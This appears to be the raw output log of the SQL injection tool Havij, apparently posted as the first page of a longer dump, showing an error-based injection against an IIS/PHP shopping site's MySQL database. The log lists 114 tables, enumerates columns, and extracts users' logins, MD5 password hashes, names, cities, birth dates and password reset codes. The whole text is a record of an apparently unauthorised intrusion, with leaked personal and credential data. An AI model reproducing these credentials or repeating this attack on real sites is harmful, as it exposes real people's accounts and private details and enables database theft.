You are on page 1of 11


Havij 1.152 Pro!

Host IP:
Web Server: Microsoft-IIS/8.0
Powered-by: PHP/5.2.16
Powered-by: ASP.NET
Keyword Found: Balloon
Injection type is Integer
DB Server: MySQL >=5
Trying another method using keyword for finding columns count
Findig columns count for MySQL failed!
Current DB: playsand_db
MySQL error based injection method can be used!
Count(table_name) of information_schema.tables where
table_schema=0x706C617973616E645F6462 is 114
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where
table_schema=0x706C617973616E645F6462 is 114
Bypassing illegal union failed! Turning off this feature
Table found: va_admin_privileges
Table found: va_admin_privileges_settings
Table found: va_admins
Table found: va_ads_assigned
Table found: va_ads_categories
Table found: va_ads_features
Table found: va_ads_features_default
Table found: va_ads_features_groups
Table found: va_ads_images
Table found: va_ads_items
Table found: va_ads_properties
Table found: va_ads_properties_default
Table found: va_ads_types
Table found: va_articles
Table found: va_articles_assigned
Table found: va_articles_categories
Table found: va_articles_images
Table found: va_articles_related
Table found: va_articles_reviews
Table found: va_articles_statuses
Table found: va_banned_contents
Table found: va_banners
Table found: va_banners_assigned
Table found: va_banners_clicks
Table found: va_banners_groups
Table found: va_black_ips
Table found: va_categories
Table found: va_cc_expiry_years
Table found: va_cc_start_years
Table found: va_change_types
Table found: va_companies
Table found: va_countries
Table found: va_coupons
Table found: va_credit_cards
Table found: va_currencies
Table found: va_custom_blocks
Table found: va_events
Table found: va_faq
Table found: va_features
Table found: va_features_default
Table found: va_features_groups
Table found: va_forum
Table found: va_forum_categories
Table found: va_forum_list
Table found: va_forum_messages
Table found: va_forum_moderators
Table found: va_global_settings
Table found: va_header_links
Table found: va_issue_numbers
Table found: va_item_types
Table found: va_items
Table found: va_items_accessories
Table found: va_items_categories
Table found: va_items_downloads
Table found: va_items_downloads_statistic
Table found: va_items_images
Table found: va_items_prices
Table found: va_items_properties
Table found: va_items_properties_values
Table found: va_items_related
Table found: va_items_serials
Table found: va_languages
Table found: va_layouts
Table found: va_manufacturers
Table found: va_news
Table found: va_newsletters
Table found: va_newsletters_emails
Table found: va_newsletters_users
Table found: va_order_custom_properties
Table found: va_order_custom_values
Table found: va_order_statuses
Table found: va_orders
Table found: va_orders_events
Table found: va_orders_items
Table found: va_orders_items_properties
Table found: va_orders_items_serials
Table found: va_orders_notes
Table found: va_orders_properties
Table found: va_orders_serials_activations
Table found: va_page_settings
Table found: va_pages
Table found: va_payment_parameters
Table found: va_payment_systems
Table found: va_polls
Table found: va_polls_options
Table found: va_polls_votes
Table found: va_release_changes
Table found: va_release_types
Table found: va_releases
Table found: va_reviews
Table found: va_shipping_modules
Table found: va_shipping_modules_parameters
Table found: va_shipping_rules
Table found: va_shipping_times
Table found: va_shipping_types
Table found: va_shipping_types_countries
Table found: va_states
Table found: va_support
Table found: va_support_attachments
Table found: va_support_departments
Table found: va_support_messages
Table found: va_support_predefined
Table found: va_support_priorities
Table found: va_support_products
Table found: va_support_statuses
Table found: va_support_time_report
Table found: va_support_types
Table found: va_support_users_departments
Table found: va_support_users_priorities
Table found: va_tax_rates
Table found: va_tax_rates_items
Table found: va_user_types
Table found: va_user_types_settings
Table found: va_users
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and table_name=0x76615F626C61636B5F697073 is
Column found: ip_address
Column found: address_action
Column found: address_notes
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and table_name=0x76615F63617465676F72696573
is 23
Column found: category_id
Column found: parent_category_id
Column found: category_path
Column found: category_name
Column found: category_name_hk
Column found: category_order
Column found: is_showing
Column found: show_sub_products
Column found: short_description
Column found: full_description
Column found: image
Column found: image_alt
Column found: image_large
Column found: image_large_alt
Column found: list_template
Column found: details_template
Column found: meta_title
Column found: meta_keywords
Column found: meta_description
Column found: admin_id_added_by
Column found: admin_id_modified_by
Column found: date_added
Column found: date_modified
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and
table_name=0x76615F63635F6578706972795F7965617273 is 1
Column found: expiry_year
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and
table_name=0x76615F63635F73746172745F7965617273 is 1
Column found: start_year
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and
table_name=0x76615F6368616E67655F7479706573 is 2
Column found: type_id
Column found: type_name
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and table_name=0x76615F636F6D70616E696573 is
Column found: company_id
Column found: company_name
Column found: image_small
Column found: image_large
Column found: address_info
Column found: phone_number
Column found: fax_number
Column found: site_url
Column found: contact_email
Column found: short_description
Column found: full_description
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and table_name=0x76615F636F756E7472696573 is
Column found: country_code
Column found: country_iso_number
Column found: country_order
Column found: country_name
Column found: currency_code
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and table_name=0x76615F636F75706F6E73 is 19
Column found: coupon_id
Column found: order_id
Column found: order_item_id
Column found: coupon_code
Column found: coupon_title
Column found: is_active
Column found: discount_type
Column found: discount_amount
Column found: discount_tax_free
Column found: free_postage
Column found: tax_free
Column found: items_all
Column found: items_ids
Column found: users_ids
Column found: minimum_amount
Column found: expiry_date
Column found: is_exclusive
Column found: quantity_limit
Column found: coupon_uses
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and
table_name=0x76615F6372656469745F6361726473 is 3
Column found: credit_card_id
Column found: credit_card_code
Column found: credit_card_name
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and table_name=0x76615F757365725F7479706573
is 6
Column found: type_id
Column found: type_name
Column found: is_default
Column found: discount_type
Column found: discount_amount
Column found: coupons_ids
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and table_name=0x76615F7573657273 is 63
Column found: user_id
Column found: user_type_id
Column found: schoolregno
Column found: schoolname
Column found: is_approved
Column found: discount_type
Column found: discount_amount
Column found: coupons_ids
Column found: login
Column found: password
Column found: security_question
Column found: security_answer
Column found: personal_image
Column found: name
Column found: first_name
Column found: last_name
Column found: gender
Column found: birth
Column found: company_id
Column found: company_name
Column found: email
Column found: address1
Column found: address2
Column found: city
Column found: province
Column found: state_code
Column found: zip
Column found: country_code
Column found: phone
Column found: daytime_phone
Column found: evening_phone
Column found: cell_phone
Column found: fax
Column found: delivery_name
Column found: delivery_first_name
Column found: delivery_last_name
Column found: delivery_company_id
Column found: delivery_company_name
Column found: delivery_email
Column found: delivery_address1
Column found: delivery_address2
Column found: delivery_city
Column found: delivery_province
Column found: delivery_state_code
Column found: delivery_zip
Column found: delivery_country_code
Column found: delivery_phone
Column found: delivery_daytime_phone
Column found: delivery_evening_phone
Column found: delivery_cell_phone
Column found: delivery_fax
Column found: howknowus
Column found: newsletter
Column found: noofkids
Column found: ageofkids
Column found: registration_ip
Column found: registration_date
Column found: modified_ip
Column found: modified_date
Column found: last_visit_ip
Column found: last_visit_date
Column found: reset_password_code
Column found: reset_password_date
Count(*) of playsand_db.va_credit_cards is 10
Data Found: credit_card_id,credit_card_code,credit_card_name=1^Visa^VISA
Data Found: credit_card_id,credit_card_code,credit_card_name=2^Visa^VISA Electron
Data Found: credit_card_id,credit_card_code,credit_card_name=3^MC^Mastercard
Data Found: credit_card_id,credit_card_code,credit_card_name=4^AMEX^American
Data Found: credit_card_id,credit_card_code,credit_card_name=5^Switch^Switch
Data Found: credit_card_id,credit_card_code,credit_card_name=6^Solo^Solo
Data Found: credit_card_id,credit_card_code,credit_card_name=7^JCB^JCB
Data Found: credit_card_id,credit_card_code,credit_card_name=8^Delta^Delta
Data Found: credit_card_id,credit_card_code,credit_card_name=9^Eurocard^Eurocard
Data Found: credit_card_id,credit_card_code,credit_card_name=10^discover^Discover
Count(*) of playsand_db.va_users is 47
Turning on 'bypass illegal union' and retrying!
Data Found: =
Can not get all data in one request, lets try one by one
Data Found: user_id=1
Data Found: user_type_id=1
Data Found: login=joy
Data Found: password=c2c8e798aecbc26d86e4805114b03c51
Turning off 'bypass illegal union' and retrying!
Data Found: security_question=
Turning on 'bypass illegal union' and retrying!
Data Found: security_answer=
Turning off 'bypass illegal union' and retrying!
Data Found: name=joy
Turning on 'bypass illegal union' and retrying!
Data Found: first_name=
Turning off 'bypass illegal union' and retrying!
Data Found: last_name=
Turning on 'bypass illegal union' and retrying!
Data Found: gender=
Turning off 'bypass illegal union' and retrying!
Data Found: birth=
Turning on 'bypass illegal union' and retrying!
Data Found: company_id=
Turning off 'bypass illegal union' and retrying!
Data Found: company_name=
Data Found:
Turning on 'bypass illegal union' and retrying!
Data Found: address1=
Turning off 'bypass illegal union' and retrying!
Data Found: address2=
Data Found: city=New York
Turning on 'bypass illegal union' and retrying!
Data Found: province=
Data Found: state_code=NY
Data Found: zip=95000
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Data Found: delivery_name=joy
Turning on 'bypass illegal union' and retrying!
Data Found: delivery_first_name=
Turning off 'bypass illegal union' and retrying!
Data Found: delivery_last_name=
Turning on 'bypass illegal union' and retrying!
Data Found: delivery_company_id=
Turning off 'bypass illegal union' and retrying!
Data Found: delivery_email=
Turning on 'bypass illegal union' and retrying!
Data Found: delivery_company_name=
Turning off 'bypass illegal union' and retrying!
Data Found: reset_password_code=
Turning on 'bypass illegal union' and retrying!
Data Found: reset_password_date=
Data Found: last_visit_date=2017-10-30 12:33:26
Data Found: user_id=4
Data Found: user_type_id=1
Data Found: login=test
Data Found: password=098f6bcd4621d373cade4e832627b4f6
Turning off 'bypass illegal union' and retrying!
Data Found: security_question=
Turning on 'bypass illegal union' and retrying!
Data Found: security_answer=
Turning off 'bypass illegal union' and retrying!
Data Found: name=test test
Data Found: first_name=test
Data Found: last_name=test
Data Found: gender=1
Data Found: birth=0000-00-00
Data Found: company_id=0
Turning on 'bypass illegal union' and retrying!
Data Found: company_name=
Turning off 'bypass illegal union' and retrying!
Data Found:
Turning on 'bypass illegal union' and retrying!
Data Found: address1=
Turning off 'bypass illegal union' and retrying!
Data Found: address2=
Data Found: city=Hong Kong
Turning on 'bypass illegal union' and retrying!
Data Found: province=
Turning off 'bypass illegal union' and retrying!
Data Found: state_code=
Turning on 'bypass illegal union' and retrying!
Data Found: zip=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Data Found: delivery_name=test test
Data Found: delivery_first_name=test
Data Found: delivery_last_name=test
Data Found: delivery_company_id=0
Data Found:
Turning on 'bypass illegal union' and retrying!
Data Found: delivery_company_name=
Turning off 'bypass illegal union' and retrying!
Data Found: reset_password_code=105764ffd1fac4e6
Data Found: reset_password_date=2017-04-16 16:48:30
Data Found: last_visit_date=2017-10-30 12:33:26
Data Found: user_id=6
Data Found: user_type_id=1
Data Found: login=eva
Data Found: password=14bd76e02198410c078ab65227ea0794
Turning on 'bypass illegal union' and retrying!
Data Found: security_question=
Turning off 'bypass illegal union' and retrying!
Data Found: security_answer=
Data Found: name=eva eva
Data Found: first_name=eva
Data Found: last_name=eva
Data Found: gender=0
Data Found: birth=2011-04-07
Data Found: company_id=0
Turning on 'bypass illegal union' and retrying!
Data Found: company_name=
Turning off 'bypass illegal union' and retrying!
Data Found:
Turning on 'bypass illegal union' and retrying!
Data Found: address1=
Turning off 'bypass illegal union' and retrying!
Data Found: address2=
Data Found: city=Hong Kong
Turning on 'bypass illegal union' and retrying!
Data Found: province=
Turning off 'bypass illegal union' and retrying!
Data Found: state_code=
Turning on 'bypass illegal union' and retrying!
Data Found: zip=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Data Found: delivery_name=eva eva
Data Found: delivery_first_name=eva
Data Found: delivery_last_name=eva
Data Found: delivery_company_id=0
Turning on 'bypass illegal union' and retrying!
Data Found: delivery_email=
Turning off 'bypass illegal union' and retrying!
Data Found: delivery_company_name=
Data Found: reset_password_code=470dade3628583e1
Data Found: reset_password_date=2017-04-16 16:49:44
Data Found: last_visit_date=2017-10-30 12:33:26
Data Found: user_id=7
Data Found: user_type_id=1
Data Found: login=Playsand
Data Found: password=ced571ace3a6af405dddc684f3441233
Turning on 'bypass illegal union' and retrying!
Data Found: security_question=
Turning off 'bypass illegal union' and retrying!
Data Found: security_answer=
Data Found: name=hani aitizem
Data Found: first_name=hani
Data Found: last_name=aitizem
Data Found: gender=1
Data Found: birth=0000-00-00
Data Found: company_id=0
Turning on 'bypass illegal union' and retrying!
Data Found: company_name=
Turning off 'bypass illegal union' and retrying!
Data Found:
Turning on 'bypass illegal union' and retrying!
Data Found: address1=
Turning off 'bypass illegal union' and retrying!
Data Found: address2=
Data Found: city=bandung
Turning on 'bypass illegal union' and retrying!
Data Found: province=
Turning off 'bypass illegal union' and retrying!
Data Found: state_code=
Turning on 'bypass illegal union' and retrying!
Data Found: zip=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Data Found: delivery_name=hani aitizem
Data Found: delivery_first_name=hani
Data Found: delivery_last_name=aitizem
Data Found: delivery_company_id=0
Data Found:
Turning on 'bypass illegal union' and retrying!
Data Found: delivery_company_name=
Turning off 'bypass illegal union' and retrying!
Data Found: reset_password_code=
Turning on 'bypass illegal union' and retrying!
Data Found: reset_password_date=
Data Found: last_visit_date=2017-10-30 12:33:26
Data Found: user_id=15
Data Found: user_type_id=1
Data Found: login=sonic
Data Found: password=bb5459bf19132d4dc1340654c17331df
Turning off 'bypass illegal union' and retrying!
Data Found: security_question=
Turning on 'bypass illegal union' and retrying!
Data Found: security_answer=
Turning off 'bypass illegal union' and retrying!
Data Found: name=sonic wong
Data Found: first_name=sonic
Data Found: last_name=wong
Data Found: gender=0
Data Found: birth=0000-00-00
Data Found: company_id=0
Turning on 'bypass illegal union' and retrying!
Data Found: company_name=
Turning off 'bypass illegal union' and retrying!
Data Found:
Turning on 'bypass illegal union' and retrying!
Data Found: address1=
Turning off 'bypass illegal union' and retrying!
Data Found: address2=
Data Found: city=Hong Kong
Turning on 'bypass illegal union' and retrying!
Data Found: province=
Turning off 'bypass illegal union' and retrying!
Data Found: state_code=
Turning on 'bypass illegal union' and retrying!
Data Found: zip=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Data Found: delivery_name=sonic wong
Data Found: delivery_first_name=sonic
Data Found: delivery_last_name=wong
Data Found: delivery_company_id=0
Turning on 'bypass illegal union' and retrying!
Data Found: delivery_email=
Turning off 'bypass illegal union' and retrying!
Data Found: delivery_company_name=
Turning on 'bypass illegal union' and retrying!
Data Found: reset_password_code=
Turning off 'bypass illegal union' and retrying!
Data Found: reset_password_date=
Data Found: last_visit_date=2017-10-30 12:33:26
Data Found: user_id=18
Data Found: user_type_id=1
Data Found: login=yvonne
Data Found: password=7878847d55c22f58e3a702fc10d98c54
Turning on 'bypass illegal union' and retrying!
Data Found: security_question=
Turning off 'bypass illegal union' and retrying!
Data Found: security_answer=
Data Found: name=yvonne yvonne
Data Found: first_name=yvonne
Data Found: last_name=yvonne
Data Found: gender=2
Data Found: birth=2011-05-18
Data Found: company_id=0
Turning on 'bypass illegal union' and retrying!
Data Found: company_name=
Turning off 'bypass illegal union' and retrying!
Data Found:
Turning on 'bypass illegal union' and retrying!
Data Found: address1=
Turning off 'bypass illegal union' and retrying!
Data Found: address2=
Data Found: city=Hong Kong
Turning on 'bypass illegal union' and retrying!
Data Found: province=
Turning off 'bypass illegal union' and retrying!
Data Found: state_code=
Turning on 'bypass illegal union' and retrying!
Data Found: zip=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Data Found: delivery_name=yvonne yvonne
Data Found: delivery_first_name=yvonne
Data Found: delivery_last_name=yvonne
Data Found: delivery_company_id=0
Turning on 'bypass illegal union' and retrying!
Data Found: delivery_email=
Turning off 'bypass illegal union' and retrying!
Data Found: delivery_company_name=
Turning on 'bypass illegal union' and retrying!
Data Found: reset_password_code=
Turning off 'bypass illegal union' and retrying!
Data Found: reset_password_date=
Data Found: last_visit_date=2017-10-30 12:33:26
Data Found: user_id=19
Data Found: user_type_id=1
Data Found: login=sowendy
Data Found: password=f4453bdd89ce71d193cd65a4c97ade08
Turning on 'bypass illegal union' and retrying!
Data Found: security_question=
Turning off 'bypass illegal union' and retrying!
Data Found: security_answer=
Data Found: name=so wendy
Data Found: first_name=so
Data Found: last_name=wendy
Data Found: gender=2
Data Found: birth=0000-00-00
Data Found: company_id=0
Turning on 'bypass illegal union' and retrying!

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